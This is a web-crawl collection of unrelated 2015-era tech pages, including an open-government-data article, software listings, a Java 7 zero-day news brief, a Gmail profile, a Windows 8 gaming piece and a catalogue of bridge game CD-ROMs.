The open questions now, so to speak, are: Will other countries use it? And to what effect? Here in the U.S., there’s already code sharing between cities. OpenChattanooga, an open data catalog in Tennessee, is using source code from OpenDataPhilly, an open government data platform built in Philadelphia by GIS software company Azavea. By the time “Data.gov in a box” is ready to be deployed, some cities, states and countries might have decided to use that code in the meantime.
There’s good reason to be careful about celebrating the progress here. Open government analysts like Nathaniel Heller have raised concerns about the role of open data in the Open Government Partnership, specifically that:
… open data provides an easy way out for some governments to avoid the much harder, and likely more transformative, open government reforms that should probably be higher up on their lists. Instead of fetishizing open data portals for the sake of having open data portals, I’d rather see governments incorporating open data as a way to address more fundamental structural challenges around extractives (through maps and budget data), the political process (through real-time disclosure of campaign contributions), or budget priorities (through online publication of budget line-items).
Similarly, Greg Michener has made a case for getting the legal and regulatory “plumbing” for open government right in Brazil, not “boutique Gov 2.0” projects that graft technology onto flawed governance systems. Michener warned that emulating the government 2.0 initiatives of advanced countries, including open data initiatives:
… may be a premature strategy for emerging democracies. While advanced democracies are mostly tweaking and improving upon value-systems and infrastructure already in place, most countries within the OGP have only begun the adoption process.
Michener and Heller both raise bedrock issues for open government in Brazil and beyond that no technology solution in of itself will address. They’re both right: Simply opening up data is not a replacement for a Constitution that enforces a rule of law, free and fair elections, an effective judiciary, decent schools, basic regulatory bodies or civil society, particularly if the data does not relate to meaningful aspects of society. “Right now, the problem we are seeing is not so much the technology around how to open data but more around the culture internally of why people are opening data,” agreed Gunderson. “We are just seeing a lot of bad data in-house and thus people wanting to stay closed. At some point a lot of organizations and government agencies need to come clean and say ‘we have not been managing our decisions with good data for a long time’. We need more real projects to help make the OGP more concrete.”
Heller and Michener speak for an important part of the open government community and surely articulate concerns that exist for many people, particularly for a “good government” constituency whose long term, quiet work on government transparency and accountability may not be receiving the same attention as shinier technology initiatives. The White House consultation on open government that I attended included considerable recognition of the complexities here.
It’s worth noting that Heller called the products of open data initiatives “websites,” including Kenya’s new open government platform. He’s not alone in doing so. To rehash an old but important principle, Gov 2.0 is not about “websites” or “portals” — it’s about web services and the emerging global ecosystem of big data. In this context, Gov 2.0 isn’t simply about setting up social media accounts, moving to grid computing or adopting open standards: it’s about systems thinking, where open data is used both by, for and with the people. If you look at what the Department of Health and Human Services is trying to do to revolutionize healthcare with open government data in the United States, that approach may become a bit clearer. For that to happen, countries, states and cities have to stand up open government data platforms. The examples of open government data being put to use that excite VanRoekel are, perhaps unsurprisingly, on the healthcare front. If you look at the healthcare community pages on Data.gov, “you see great examples of companies and providers meeting,” he said, referencing two startups from a healthcare challenge that were acquired by larger providers as a result of their involvement in the open data event.
I’m cautiously optimistic about what this news means for the world, particularly for the further validation of open source in open government. With this step forward, the prospects for stimulating more economic activity, civic utility and accountability under a global open government partnership are now brighter.
Historic global Open Government Partnership launches in New York City
Government IT’s quiet open source evolution
International Open Government Data Camp looks to build community
tags: Gov 2.0, government as a platform, open data, open government, open source, stratablog
Get the O’Reilly Data Newsletter
Stay informed. Receive weekly insight from industry insiders.
Dave Bucci
To be truly open, it’s important for the whole stack to be open source. For instance, other government efforts have open-sourced portal software, but which relies on proprietary GIS software under the covers (notably ESRI). While that’s a perfectly valid architectural choice for a system, it limits the ability of groups to replicate and innovate using the software, because of the cost factors that are a barrier to entry.
By simply building upon a truly open source stack (e.g., OS Geo), any group, large or small, can openly innovate upon the offering.
Ilkka Rinne
When taking about open data or open access web services, even more important that the software stack being Open Source is that the interfaces are based on open standards. In the case of GIS those standards are developed by the Open Geospatial Consortium, W3C, OASIS etc.
There should be no problem communicating between web services provided by ESRI and the ones by OS Geo if they both follow the same OGC standards.
Get the Data Newsletter Stay informed. Receive weekly insight from industry insiders.
Recent Posts Four short links: 30 November 2015
Four short links: 27 November 2015
Kristian Hammond on truly democratizing data and the value of AI in the enterprise | 计算机 |
2015-48/3677/en_head.json.gz/13945 | Apache is the world's most popular HTTP server,
being quite possibly the best around in terms of
functionality, efficiency, security and speed.
Linux is a clone of the Unix kernel, written from scratch by Linus Torvalds with assistance from a loosely-knit team of hackers across the Net. It aims towards POSIX and Single UNIX Specification compliance. It has all the features you would expect in a modern fully-fledged Unix kernel, including true multitasking, virtual memory, shared libraries, demand loading, shared copy-on-write executables, proper memory management, and TCP/IP networking. GPLLinuxOperating System KernelsOperating Systems
PostgreSQL is a robust relational database system with over 25 years of active development that runs on all major operating systems. It is fully ACID compliant, and has full support for foreign keys, joins, views, triggers, and stored procedures (in multiple languages). It includes most SQL92 and SQL99 data types, including INTEGER, NUMERIC, BOOLEAN, CHAR, VARCHAR, DATE, INTERVAL, and TIMESTAMP. It also supports storage of binary large objects, including pictures, sounds, or video. It has native programming interfaces for C/C++, Java, .Net, Perl, Python, Ruby, Tcl, and ODBC, among others, and exceptional documentation.
PostgreSQL LicenseDatabaseDatabase Engines/Servers
KDE Software Compilation
For users on Linux and Unix, KDE offers a full suite of user workspace applications which allow interaction with these operating systems in a modern, graphical user interface. This includes Plasma Desktop, KDE's innovative and powerful desktop interface. Other workspace applications are included to aid with system configuration, running programs, or interacting with hardware devices. While the fully integrated KDE Workspaces are only available on Linux and Unix, some of these features are available on other platforms. In addition to the workspace, KDE produces a number of key applications such as the Konqueror Web browser, Dolphin file manager, and Kontact, the comprehensive personal information management suite. The list of applications includes many others, including those for education, multimedia, office productivity, networking, games, and much more. Most applications are available on all platforms supported by the KDE Development. KDE also brings to the forefront many innovations for application developers. An entire infrastructure has been designed and implemented to help programmers create robust and comprehensive applications in the most efficient manner, eliminating the complexity and tediousness of creating highly functional applications.
GPLSoftware DevelopmentInternetmultimediaUtilities
MySQL is a widely used and fast SQL database
server. It is a client/server implementation that
consists of a server daemon (mysqld) and many
different client programs/libraries. GPLDatabaseDatabase Engines/Servers
fio is an I/O tool meant to be used both for benchmark and stress/hardware verification. It has support for 19 different types of I/O engines (sync, mmap, libaio, posixaio, SG v3, splice, null, network, syslet, guasi, solarisaio, and more), I/O priorities (for newer Linux kernels), rate I/O, forked or threaded jobs, and much more. It can work on block devices as well as files. fio accepts job descriptions in a simple-to-understand text format. Several example job files are included. fio displays all sorts of I/O performance information, including complete IO latencies and percentiles. Fio is in wide use in many places, for both benchmarking, QA, and verification purposes. It supports Linux, FreeBSD, NetBSD, OpenBSD, OS X, OpenSolaris, AIX, HP-UX, Android, and Windows.
GPLv2FilesystemsBenchmark
The SeaMonkey project is a community effort to develop an all-in-one Internet application suite. It contains an Internet browser, email and newsgroup client with an included Web feed reader, HTML editor, IRC chat, and Web development tools, and is sure to appeal to advanced users, Web developers, and corporate users. It uses much of the Mozilla source code powering such successful siblings as Firefox, Thunderbird, Camino, Sunbird, and Miro.
cygbuild
A porting tool for making Cygwin net releases.
pmcyg
A tool for creating customized Cygwin installers. | 计算机 |
2015-48/3678/en_head.json.gz/364 | / root / Linux Books / Red Hat/Fedora
release date:May 2006
Continuing with the tradition of offering the best and most comprehensive coverage of Red Hat Linux on the market, Red Hat Fedora 5 Unleashed includes new and additional material based on the latest release of Red Hat's Fedora Core Linux distribution. Incorporating an advanced approach to presenting information about Fedora, the book aims to provide the best and latest information that intermediate to advanced Linux users need to know about installation, configuration, system administration, server operations, and security.
Red Hat Fedora 5 Unleashed thoroughly covers all of Fedora's software packages, including up-to-date material on new applications, Web development, peripherals, and programming languages. It also includes updated discussion of the architecture of the Linux kernel 2.6, USB, KDE, GNOME, Broadband access issues, routing, gateways, firewalls, disk tuning, GCC, Perl, Python, printing services (CUPS), and security. Red Hat Linux Fedora 5 Unleashed is the most trusted and comprehensive guide to the latest version of Fedora Linux.
Paul Hudson is a recognized expert in open source technologies. He is a professional developer and full-time journalist for Future Publishing. His articles have appeared in Internet Works, Mac Format, PC Answers, PC Format and Linux Format, one of the most prestigious linux magazines. Paul is very passionate about the free software movement, and uses Linux exclusively at work and at home. Paul's book, Practical PHP Programming, is an industry-standard in the PHP community. manufacturer website | 计算机 |
2015-48/3678/en_head.json.gz/535 | Data files used to study the distribution of growth in software systems
Download Description accompanying growth dynamics data files (PDF) (Adobe Acrobat PDF, 96 KB)
Vasa, Rajesh
The evolution of a software system can be studied in terms of how various properties as reflected by software metrics change over time. Current models of software evolution have allowed for inferences to be drawn about certain attributes of the software system, for instance, regarding the architecture, complexity and its impact on the development effort. However, an inherent limitation of these models is that they do not provide any direct insight into where growth takes place. In particular, we cannot assess the impact of evolution on the underlying distribution of size and complexity among the various classes. Such an analysis is needed in order to answer questions such as 'do developers tend to evenly distribute complexity as systems get bigger?', and 'do large and complex classes get bigger over time?'. These are questions of more than passing interest since by understanding what typical and successful software evolution looks like, we can identify anomalous situations and take action earlier than might otherwise be possible. Information gained from an analysis of the distribution of growth will also show if there are consistent boundaries within which a software design structure exists. The specific research questions that we address in Chapter 5 (Growth Dynamics) of the thesis this data accompanies are: What is the nature of distribution of software size and complexity measures? How does the profile and shape of this distribution change as software systems evolve? Is the rate and nature of change erratic? Do large and complex classes become bigger and more complex as software systems evolve? In our study of metric distributions, we focused on 10 different measures that span a range of size and complexity measures. In order to assess assigned responsibilities we use the two metrics Load Instruction Count and Store Instruction Count. Both metrics provide a measure for the frequency of state changes in data containers within a system. Number of Branches, on the other hand, records all branch instructions and is used to measure the structural complexity at class level. This measure is equivalent to Weighted Method Count (WMC) as proposed by Chidamber and Kemerer (1994) if a weight of 1 is applied for all methods and the complexity measure used is cyclomatic complexity. We use the measures of Fan-Out Count and Type Construction Count to obtain insight into the dynamics of the software systems. The former offers a means to document the degree of delegation, whereas the latter can be used to count the frequency of object instantiations. The remaining metrics provide structural size and complexity measures. In-Degree Count and Out-Degree Count reveal the coupling of classes within a system. These measures are extracted from the type dependency graph that we construct for each analyzed system. The vertices in this graph are classes, whereas the edges are directed links between classes. We associate popularity (i.e., the number of incoming links) with In-Degree Count and usage or delegation (i.e., the number of outgoing links) with Out-Degree Count. Number of Methods, Public Method Count, and Number of Attributes define typical object-oriented size measures and provide insights into the extent of data and functionality encapsulation. The raw metric data (4 .txt files and 1 .log file in a .zip file measuring ~0.5MB in total) is provided as a comma separated values (CSV) file, and the first line of the CSV file contains the header. A detailed output of the statistical analysis undertaken is provided as log files generated directly from Stata (statistical analysis software).
Research dataset
Originally presented as an appendix to: Vasa, R. (2010). Growth and change dynamics in open source software systems. PhD thesis,
Appendix E: Growth Dynamics Data Files, p. 204
080306 Open Software; 080309 Software Engineering; 8902 Computer Software and Services
Metrics; Open source software; PhD theses completed in 2010; Software evolution; Software engineering; Software maintenance
Faculty of Information and Communication Technologies, Swinburne University of Technology
Australasian Digital Theses collection
Copyright © 2010 Rajesh Vasa. The files are made available here with the kind permission of the creator under the terms of a Creative Commons Attribution 3.0 Unported (CC BY 3.0) licence (http://creativecommons.org/licenses/by/3.0/). The full thesis is available from: http://hdl.handle.net/1959.3/95058.
Thesis Supervisor
[Jean-Guy Schneider]
Thesis Note
[This research dataset accompanies a thesis submitted for the degree of Doctor of Philosophy, Swinburne University of Technology, 2010.] | 计算机 |
2015-48/3678/en_head.json.gz/4337 | Group NameCreate New GroupClipTed SchadlerVice President, Principal Analyst serving Application Development & Delivery PROFESSIONALSBlog:
Ted serves Application Development & Delivery Professionals. He has 27 years of experience in the technology industry, focusing on the effects of disruptive technologies on people and on businesses. His current research agenda analyzes the expanding role of content and content delivery in a mobile-first, digital-always world, including the effects on web content management and digital experience delivery platforms.
Ted is the coauthor of The Mobile Mind Shift: Engineer Your Business to Win in the Mobile Moment (Groundswell Press, June 2014). Your customers now turn to their smartphones for everything. What's tomorrow's weather? Is the flight on time? Where's the nearest store, and is this product cheaper there? Whatever the question, the answer is on the phone. This Pavlovian response is the mobile mind shift — the expectation that I can get what I want, anytime, in my immediate context. Your new battleground for customers is this mobile moment — the instant in which your customer is seeking an answer. If you're there for them, they'll love you; if you're not, you'll lose their business. Both entrepreneurial companies like Dropbox and huge corporations like Nestlé are winning in that mobile moment. Are you?
Ted is also the coauthor of Empowered: Unleash Your Employees, Energize Your Customers, and Transform Your Business (Harvard Business Review Press, September 2010). Social, mobile, video, and cloud Internet services give consumers and business customers more information power than ever before. To win customer trust, companies must empower their employees to directly engage with customers using these same technologies.Previous Work ExperiencePreviously, Ted analyzed the consumerization of IT and its impact on a mobile-first workforce, the future of file services in a mobile-first, cloud-enabled world, mobile collaboration tools, workforce technology adoption and use, and the rise of cognitive computing. In 2009, Ted launched Forrester's Workforce Technology Assessment, the industry's first benchmark survey of workforce technology adoption. This quantitative approach helps professionals and the teams they work with have a fact-based conversation about employees' technology adoption.
Prior to joining Forrester in April 1997, Ted was a cofounder of Phios, an MIT spinoff. Before that, Ted worked for eight years as CTO and director of engineering for a software company serving the healthcare industry. Early in his career, Ted was a singer and bass player for Crash Davenport, a successful Maryland-based rock-and-roll band.EducationTed has a master's degree in management from the MIT Sloan School of Management. He also holds an M.S. in computer science from the University of Maryland and a B.A. with honors in physics from Swarthmore College.(Read Full Bio)(Less)275Research CoverageAdobe Systems, Apple, Cisco Systems, Citrix Systems, Collaboration Platforms, Dell, Enterprise Collaboration, Google, Hewlett-Packard (HP), IBM | 计算机 |
2015-48/3678/en_head.json.gz/6007 | New Zero-Day Java 7 Vulnerability Detected
EuroFight - January 11, 2013 04:29PM in Bugs / Virus
A malware exploit has been reported named Mal/JavaJar-B. The malware exploits a vulnerability in Java 7 that is already being used against systems and distributed among hackers, but has not yet been patched. The malware allows hackers to run code remotely on infected machines running Windows, Linux, and Unix, although Mac OS X remains safe as of now. The U.S. Department of Defense has advised users to disable Java on any systems running the software.
Users with the software installed can easily disable the software from running in the browser through unchecking 'Enable Java content in the browser' under 'Security' in the Java Control Panel. Java has recently played victim to a number of exploits that have used its broad implementation for more sinister purposes. Despite this, Java also provides a great platform for small developers to deploy their software, and has played host to many well-known titles such as Minecraft. | 计算机 |
2015-48/3678/en_head.json.gz/8999 | Paul Buchheit, the Man Behind Gmail
Creative Commons-licensed by jm3"I think, in general, people are uncomfortable with things that are different. Even now when I talk about adding new features to Gmail, if it isn't just a small variation or rearranging what's already there, people don't like it. People have a narrow concept of what's possible, and we're limited more by our own ideas about what's possible than what really is possible. So they just get uncomfortable, and they kind of tend to attack it for whatever reason."(Paul Buchheit, the creator of Gmail)Paul Buchheit is the man behind Gmail, the first and the most successful AJAX web application from Google.On April 1, 2004, we rolled out the first release of Gmail. It immediately became known for giving away 1000 MB of storage, while the others only offered 4 MB, as they had for many years. We didn't do that just for the attention (although we certainly got our share). It's just part of our philosophy. We always want to do as much as we can for our users, and so if we can make something free, we will.But storage was only the most obvious difference, and our other improvements were just as important. Gmail included a quick and accurate search. It introduced powerful new concepts to organize email, such as the conversation view (so now I can finally see all those replies at once). It provided a fast and dynamic interface from web browsers everywhere, popularizing the techniques that have since become known as AJAX.This interface included many important features not commonly found on the web at that time, such as email address auto-completion, a slick spell-checker, keyboard shortcuts, and pages that update instantly. It included a smart spam filter to get rid of junk mail. Finally, we made an important new promise: you can keep your Gmail address and all of your email, even if you someday decide that Gmail is not for you. Cell phone owners already have the right to keep their old phone number when switching to a new provider, and you should have that same freedom with email. To ensure this freedom, Gmail provides, for free, both email forwarding and POP download of all your mail. Many services are now beginning to include other Gmail innovations; we hope that some day they will also be willing to include this one.But Gmail managed to make other competing email services improve.Mr. Buchheit said he started working on Gmail after observing that other email programs were getting worse, not better. Microsoft's Mr. Doerr said that at his company, Gmail was a thunderbolt. "You guys woke us up," he told Mr. Buchheit. Yahoo's Mr. Diamond, then at a startup with its own hot, new email program, [OddPost, now known as Yahoo Mail Beta] said Gmail was the final impetus that Yahoo needed to buy his company.Mr. Buchheit responded with a victory lap. "We were trying to make the email experience better for our users," he said. "We ended up making it better for yours, too.""Paul was one of the first engineers at Google. Among other things, he came up with the idea for PigeonRank. Oh yeah, and Gmail, which he largely built himself in the middle of the night. Paul liked to get to the office after noon or even at dinnertime, then work on into the next morning," recalls an ex-Googler. He also wrote the original prototype of Google AdSense and came up with Google's mantra: "Don't be evil". He joined Google in 1999, but he left the company last year because his life there became "too predictable, and too typical." But you can find him at his blog where he still talks a lot about Google.
Gmail, | 计算机 |
2015-48/3678/en_head.json.gz/9718 | Posted Blizzard agrees with Valve: Windows 8 is bad for video game makers By
The world’s biggest PC video game makers aren’t very happy about Microsoft’s new operating system, Windows 8. Speaking with one-time Microsoft Game Studios chief, Ed Fries, at a Casual Connect earlier this week, Valve’s Gabe Newell described Microsoft’s plans as a “catastrophe.”
“Windows 8 is kind of a catastrophe for everybody in the PC space,” said Newell, “I think that we’re going to lose some of the top-tier PC [original equipment manufacturers]. They’ll exit the market. I think margins are going to be destroyed for a bunch of people. If that’s true, it’s going to be a good idea to have alternative to hedge against that eventuality.”
Newell says this is why Valve is pushing hard to bring its games, its Source engine, and the Steam digital distribution platform to the Linux operating system.
Is he alone in thinking that Windows 8 will be a disaster for the PC gaming industry? Blizzard’s Rob Pardo doesn’t think so. The StarCraft designer and current vice president of game design at Diablo III studio Blizzard said that he believes Microsoft’s new operating system will also be a thorn in his company’s side.
Pardo Tweeted on Wednesday, “Nice interview with Gabe Newell—‘I think Windows 8 is a catastrophe for everyone in the PC space’—not awesome for Blizzard either.”
The belief in the development community is that Microsoft will make Windows 8 a closed system, an operating system that seeks to more stringently control, much in the way that Apple does with Mac OS X and the iOS platform. This would allow Microsoft to better monitor the quality of applications running on its platform, but it will also wall off the most widely used operating system in the world from myriad developers. PC game makers use Windows because of the openness of the platform and its ubiquity. If Microsoft takes that openness away, what will developers do?
Windows 8 won’t be released until October of this year, so Microsoft still has time to decide exactly how free game and application makers will be to use the system. Valve and Blizzard are, by sales and reputation, the biggest PC game makers in the world and their influence over Microsoft’s platform isn’t insignificant. If Blizzard and others follow Valve to Linux platforms, what will Microsoft do to lure them back? Will PC gaming become increasingly based on streaming and browser-based solutions? | 计算机 |
2015-48/3678/en_head.json.gz/10248 | Bridge CD-ROMs & DVDs Click to get the frames link column
This is a the selection of some of the best bridge card game CD-ROMs around. Most are for sale over the internet at the Amazon.com store. Click for the no frames page
A limited number of these items, plus a nubmer of additional ones not available from Amazon.com, are available from Amazon.co.uk __________________________
"Play Modern bridge" with Andrew Robson covers eight aspects of bridge. Andrew covers all the basic areas of the game, each concluding with a concise "If you remember just three things", which can also be acessesd seperately. The aspects are:
Bidding as Opener
Bidding as Responder
Using Trumps
Opening One No trump and Responding
Card Play Techniques
Overcalling
Opening Leads and Defence
The key features of this unique product:
Over three hours of quality teaching
Live format - with four keen students learning at a table
Graphical representation of the hands for clarity
Easy to understand illustrative Flow Charts and Diagrams
Ideal for learning - with repeat viewing freeze-frame, and summaries
Click the links for previews of this DVD on clip1 and clip2 on youtube.
Bridge is a poplular game that has a long history to it. It is one of the more popular casino games , that can be played at home, out with friends or even online. The newest version of the most popular bridge playing program - five times world computer bridge champion. Bridge Baron 22 (for Windows or MAC) offers over 40 play levels; optional double dummy card play and a choice of bidding systems - Standard American, 2/1, Acol, French 5-card major, Forum D, Precision or SAYC. The latest features include: This new (October 18, 2011) version 22 has new Bridge Tournaments for free, such as the 2011 Cavendish (with Butler cross-IMPs scoring) and the 2011 NSWBA ANC Butler Open Section (with Butler IMPs Scoring).
Also added are 24 new challenging problem deals for a total of 326 Challenges. Kit woolsey, multiple world champion and author of several bridge books, designed the new deals. You can now see what Bridge Baron is �thinking� about, at higher levels of bidding and play.
At higher levels of bidding and play, while Bridge Baron is �thinking�, you can force it to bid or play immediately by clicking the �Bid Now� or �Play Now� button The option to choose among hand evaluation methods, such as long-suit point count or short-suit point count.
On the Mac, vastly improved user interface
Improved bidding and play, including improved Two-over-One bidding, improved matchpoint-focused bidding and play when playing tournament deals at matchpoints, and more realistic double-dummy cardplay Bridge Baron offers you the most comprehensive, easy-to-use, bridge game available. Bridge Baron 18 Express Edition has over 40 skills levels, plays 500 deals, over 95 optional bidding conventions and many other features. Compete in tournaments deals. Hints are always available (including reasons why). Double dummy solver. Par contract analysis. Choose long-suit or short suit point count. Conventional bids alerted or announced. With all these features, it's no wonder that Bridge Baron is five-time winner of the world computer bridge championships. To accompany your Bridge Baron their are a number of Bridge Tournament CD-ROMs. With these CD's you can see your matchpoint scores, calculated using the actual North American championship results and you can see how you would have placed in that session if you had partnered with Bridge Baron in the actual ACBL tournament. Tournament CD's currently available are: ..1,
Chicago '98, Orlando '98, Vancouver '99, San Antonio '99 ..7,
Miami beach '75, Winnipeg '85, Atlanta '95
..8,
New Orleans'03, Reno '04, New York '04
Orlando '04, Pittsburgh '05, Atlanta '05 10,
Cavendish '00 - '04 11,
Denver '05, Dallas '06, Chicago '06 12,
Hawaii '06, St. Louis '06, Nashville '07 13,
San Francisco '07, Detroit '08, Las vegas '08 14,
Boston '08, Houston '09, Washington DC '09
In order to get the most out of your Bridge Baron, order the book Bridge Baron Companion - How to Get the Most Out of Your Computer Bridge Game, which is reviewed in bridge books reviewed page 15. __________________________
Bridge Buff 19 and Bridge Deal 7 is two programs on one CD. Bridge Buff plays a great game of bridge and is highly praised throughout the Bridge Community. It is perfect for all levels of players, with tutorials for beginners and intermediates, and large numbers of conventions (codified deep into the auction), for more advanced players. Note that the Amazon box says Bridge Buff #17, it is actually #18. Visual Deal is a versatile deal generator with an integrated double dummy analyser. You can design hands in many ways such as hands suitable for a specific convention or hand pattern. Bridge Buff features excellent auction stability and uses Visual Deal to deal out thousands of randomly generated deals, complete with auctions. Each auction is then tested for reasonableness. There is a matchpoint-style bidding mode featuring aggressive bidding sequences around the table, similar to action found in your local duplicate club. There are two playing modes. In Practice mode, you have full control over every element of the game, and you can redeal, rebid, replay, take back cards, peek, and cheat as much as you want. In Match mode, you play a series of hands against a 'closed room' opponent and can play Teams, Pairs and Individual matches. Match mode also includes matchpoint estimates so you can measure how well you are doing against both strong and weak fields. The Bridge Buff displaylooks terrific and is exceptionally easy to use. It features one-button access to most functions, and includes balloon help comments over most buttons. Bridge Buff features a huge range of optional modern conventions.
Apart from all of the above, there is one very important feature for serious players that sets Bridge Buff apart from all of the other bridge playing programs. The program supports three basic bidding systems, Standard American, 2/1, and Kaplan-Sheinwold;
but the 'System Builder' which enables you to define a system or convention a bid at a time. For example, if you want to play Precision Club, you can specify that any hand with 16+ high card points be opened 1C, and that after the sequence "1C-P", partner should bid 1H with 5 Hearts and 8+ HCPs, and so on. This is the only Bridge playing program which offers this capability. Bridge Baron and GIB do not support Precision at all. Q-Plus does support Precision, but there is not one standard version of Precision, so it is unlikely that Q-Plus plays the specific variation that you play, and there is no way to modify it to make it do so, as you can with Bridge Buff. Also, when Bridge Buff makes a bidding error, you can go into System Builder and make an entry to correct it. Then when the same situation arises in the future, Bridge Buff will bid the way you want it to. Even if you never create a system of your own, it is worth learning to use builder to fix these kinds of errors.
Visual Deal is a hugely flexible Deal Generator that stands alone by virtue of its ease-of-use, its flexibility, and the fact it includes the generation of complete auctions and play-of-the-hand. Visual Deal uses Bridge Buff bidding and playing modules. You can watch deals one-by-one, or run a series of deals (10 to 1000) and accumulate statistics, or print a series of deals to a printer or file. The print formats are very flexible, including all needed for dealing machines.
Apart from Bridge Buff and Visual Deal, there are three other useful programs included on the CD-ROM. Bid Buddy. If you want a distraction from boring work, Bid Buddy is a fun utility that pops up on your desktopwith an exciting hand to bid (you schedule how often).
Bid Sequencer. Want help writing systen notes? Bid Sequencer generated bidding sequences (you decide which, up to 44,000 of them, in an Excel spreadsheet.
Convention Card Editor. which enables you to ediat your ACBL format convention card. __________________________
Jack is winner of seven World Computer Computer Bridge Championships: in 2001, 2002, 2003, 2004, 2006, 2009 and 2010. Jack 5.0 is the strongest bridge program available with a new biddding and play engine, Jack is very user friendly and offers numerous exciting features and options:
Over 30 levels of play. Build your own convention card using over 65 conventions.
Or Use one of the built-in convention cards like Standard American or Two-over one.
Convention cards for beginners are also available. Adjustable opening lead systems and defensive signal methods.
You may ask for hints during bidding or play.
Extensive built in help with many examples.
Play with up to four people in a network or over the internet.
You have complete control over the generated deals using the deal profiler.
Jack can analyse a position and show you what he thinks about it.
The fastest double dummy solver in the world will show you how many tricks can be made with each card.
Play duplicate, rubber or Chicago bridge.
Create your own tournaments or play in one of the many provided.
Determine the par score for any hand; Jack will tell you the optimal contracts for both sides.
Tip of the day, each time Jack is started.
Extensive printing capabilities. __________________________
GIB (Ginsberg's Intelligent Bridge) is the winner of two world bridge computer championships, this lastest version is faster and stronger than previous versions. It offers a wide range of bidding systems including Standard American, two-over-one, Kaplan-Sheinwold, Goren and Acol. Other features include: Highest quality of play of any bridge program, commercial or otherwise. Easy-to-use graphical interface click for screen shot. Multilingual interface supporting Dutch, English, Finnish, French, German, Hungarian, Italian and Swedish. Get hints or watch GIB think. Compare your play with closed room experts: Replay 2500+ deals from international tournaments and compare your actions to those of the masters. Variety of defensive signalling options. Not only does GIB signal, it watches your signals and defends appropriately. The only computer program ever to have been a member of the ACBL or to have won master points in play against humans. ACBL and international-style convention cards. Wide range of bidding systems, including Standard American, two-over-one Game Forcing, Kaplan-Sheinwold, ACOL, and traditional Goren; and also many individual conventions. High-visibility card option for use on small or hard-to-read screens. Sophisticated artificial intelligence search algorithms use Monte Carlo techniques for card play and Borel simulations for bidding.
A few testimonials about GIB:
"Sensational breakthrough in bridge software" (Onno Eskes, editor of the Dutch Bridge Magazine IMP)
"Revolutionary; certainly much better than any other program I have ever seen ... entirely in a class by itself" (Fred Gitelman, Canadian international) -
"Tremble for the human race" (Zia Mahmood, world champion)
"Impressed by the quality of its card play" (Jeff Meckstroth, world champion) -
"Ginsberg has shown that his program plays the cards much much better than any program on the market" (Jim Loy's software review) __________________________
The main meat of this program is playing bridge against the computer, although there is also a multiplayer option. You can use three bidding systems with Omar Sharif Bridge - Acol, 5 Card Majors and Standard American - and hands can be set up randomly, or you can bias the deal so you're more likely to get a good hand. .
There is also a tutorial mode consisting of text-only comments on a selection of a hundred hands, complete with bidding and ideal play instructions, rather like the ones you get in the papers. These are quite useful in that each illustrates a salient bridge tactic. It's not really for beginners - only intermediate.
Although online roulette is currently the most popular casino game around, casino card games are also rising in popularity. Play the World's most challenging and popular casino card game with "Omar Sharif Bridge 2". Enter the exciting world of Bridge, featuring new 3D graphics that bring the environments to life. Play a challenging game of Chicago or Rubber, or step up to play full teamplay Duplicate and Pairs tournaments! Omar Sharif Bridge II offers a game of intricate deliberation, skill and chance for the novice and expert. Features include: - Experience Bridge like never before with lavish 3D home, club and tournament environments. Sharpen your skills as you progress from the home to the club and then a major tournament! Compete against 80 opponents with many styles and varying strength.
Offers Teamplay events and Pairs tournaments. Master Card champion Omar Sharif shows you how to improve your game and takes you through the bids. Chart your bridge career progression. Challenge opponents with LAN and internetplay! Adjust your game settings to such rules as Acol, Standard American, 5 Card Majors, Standard English and Modern Acol. __________________________
Omar Sharif's Bridge Deluxe II is a superb update of Oxford Softworks' 1991 Omar Sharif on Bridge, also published by Interplay. Although the most obvious improvements are cosmetics - better graphics and lots of multimedia video starring Omar Sharif - Bridge Deluxe II also features much-improved software and numerous new options. The game contains a wide range of options that allow both beginners and experts alike to enjoy a game of bridge. There are over 20 playing options including conventions such as Stayman, Jacoby Transfers, Take-out Doubles and loads more. You can also choose to practice different strategies such as slam bids, and use the take-back and review options to analyze your game. In addition to full-motion video clips (including an extensive tutorial) starring Omar Sharif, the game has one of the best on-line reference materials on bridge around.You can browse an extensive guide to bidding and strategies, a how-to guide for scoring rubbers, and also a comprehensive glossary. __________________________
The unique Bridge 3000 is one of the most fully featured bridge games with superb multi-player gaming options and a great interface. This intelligent bridge program is suitable for bridge players of all standards, providing extra features for both novices and experienced bridge. Features include: Deep thought option. Bidding history preview. Network game mode for several players. Support for all major bidding conventions. Screen resolutions up to 1600x1200. Several different backgrounds. Abundant in-game sounds. High level of intelligence. Intuitive interface. 2D and 3D graphical interface. Many help options for beginners (including cheats). __________________________
3D Bridge deluxe Computer (MAC) game retail box is a new (2011) product:
3D Bridge Deluxe is a great way for beginners to learn the game with its own tutorials that will give you enough of the basics to play online with real people and get rankings on the GameSmith Game Server.
Many Bidding Styles: Weak 2 Bids, Weak Jump Overcalls, Takeout Doubles, Cuebids for Slam Bidding, Blackwood Convention, Gerber Convention, Stayman Convention, Jacoby Transfers.
Voice recognition 3D animated, interchangeable, talking opponents Card game engine is enthusiastically recognized as the best in the world by the Macintosh community.
Hoyle Bridge Club is a friendly, funny new take on the classic card game. Choose from 11 unique characters, from zany goofballs to stiff businessmen - even a pirate and a puppy. All characters have their own voice-acting and playing styles, to make each game different. Along with standard bidding conventions, it also has game saves, reloads and hand replays. Also features a variety of backgrounds, card backs, and Sound sets to make the experience more colorful. .
. Features include: Play online, against the computer, or the traditional way
3 classic Bridge games - Rubber, Chicago, and Duplicate
Adjustable skill levels and in-game tutorials
Deck of playing cards; official rulebook, and scorepad
(if bought new) Free Bridge Today magazine; membership to Bridge Club Live (if bought new) 4 & 5 card majors bidding 'Explain Hand' option gives bidding information and estimated high card points and distribution for each player
Includes a built in tutorial that offers a comprehensive Bridge lesson from beginner to intermediate club player levels.
A robust set of play options __________________________
Victorymul Bridge Butler is the perfect program for beginning players who want to practice basic bridge skills. Bridge Butler plays "Standard American 5-card Majors" including the Stayman, Blackwood and Gerber bidding conventions. With the help of 7 optional bidding conventions (Weak 2 bids, Weak Jump Overcalls, Negative Doubles, Jacoby Transfers, Unusual Notrump, Limit Major Raises, Michaels Cue-bids) and a variable 1NT range, you can also practice the "Standard American Yellow Card" (SAYC). The hint and replay features are great and the bidding, such an important part of Bridge, is made more understandable by the ability to replay which allows for a very good learning experience. If you enjoy playing rubber bridge you can play rubber after rubber, keep a running account of score, which lets you know how well you are progressing against the computer. __________________________
"World's Best Bridge" CD ROM is yet another bridge computer game, offering a fun and easy way to learn the game at home and to improve your play up to the expert level.
Features include: - Built-in tutorial to teach Bridge to beginners.
Gives tips to inexperienced amd improving players.
